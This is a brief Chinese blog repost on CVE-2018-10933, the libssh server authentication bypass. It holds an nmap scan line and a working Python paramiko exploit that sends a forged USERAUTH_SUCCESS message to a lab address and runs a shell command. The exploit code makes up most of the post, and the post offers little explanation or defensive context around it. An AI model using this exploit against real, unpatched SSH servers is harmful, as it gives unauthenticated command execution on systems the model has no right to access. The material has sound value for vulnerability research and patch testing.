CVE-2018-10933 LibSSH auth bypass

时间：2019-12-01 14:44:34 阅读：85 评论：0 收藏：0 [点我收藏+]

漏洞原理

认证实现错误，

认证分为多个步骤，可以直接跳到成功的步骤

A vulnerability was found in libssh‘s server-side state machine before versions 0.7.6 and 0.8.4.

22/tcp open ssh libssh 0.8.3 (protocol 2.0)

| ssh-hostkey:

|_ 2048 fe:d7:54:08:9d:1c:ba:18:4c:ba:22:3c:75:c9:39:5e (RSA)

import paramiko
import socket
sock = socket.socket()
try:
   sock.connect((str(‘192.168.232.198‘), int(22)))
 
 
   message = paramiko.message.Message()
   transport = paramiko.transport.Transport(sock)
   transport.start_client()
 
 
   message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
   transport._send_message(message)
 
 
   cmd = transport.open_session()
 
 
   stdin, stdout, stderr = cmd.exec_command("touch /tmp/3")
   res,err = stdout.read(),stderr.read()
   result = res if res else err
 
 
   print(result)
except:
    pass

CVE-2018-10933 LibSSH auth bypass

原文：https://www.cnblogs.com/junmoxiao/p/11965788.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)